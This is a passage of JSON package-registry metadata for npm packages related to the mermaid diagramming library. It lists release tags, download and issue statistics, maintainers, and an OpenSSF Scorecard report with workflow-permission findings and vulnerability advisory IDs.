id/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.948Z","dependent_packages_count":0,"downloads":405,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":28.67124368638263,"dependent_packages_count":41.67499361561098,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":35.173118650996805},"purl":"pkg:npm/better-mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/better-mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/better-mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/better-mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/better-mermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/better-mermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/better-mermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/better-mermaid/related_packages","maintainers":[{"uuid":"yanbob","login":"yanbob","name":null,"email":"zhourambo@gmail.com","url":null,"packages_count":1,"html_url":"https://www.npmjs.com/~yanbob","role":null,"created_at":"2024-05-24T02:59:45.621Z","updated_at":"2024-05-24T02:59:45.621Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/yanbob/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8600125,"name":"@mermaid-js/parser","ecosystem":"npm","description":"MermaidJS parser","homepage":"https://github.com/mermaid-js/mermaid/tree/develop/packages/mermaid/parser/#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["mermaid","parser","ast"],"namespace":"mermaid-js","versions_count":12,"first_release_published_at":"2023-11-26T15:41:01.839Z","latest_release_published_at":"2025-07-16T12:08:46.990Z","latest_release_number":"0.6.2","last_synced_at":"2025-09-01T12:55:58.278Z","created_at":"2023-11-26T15:46:22.112Z","updated_at":"2025-09-01T14:17:51.349Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/parser","install_command":"npm install @mermaid-js/parser","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"0.3.1-rc.1","latest":"0.6.2"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z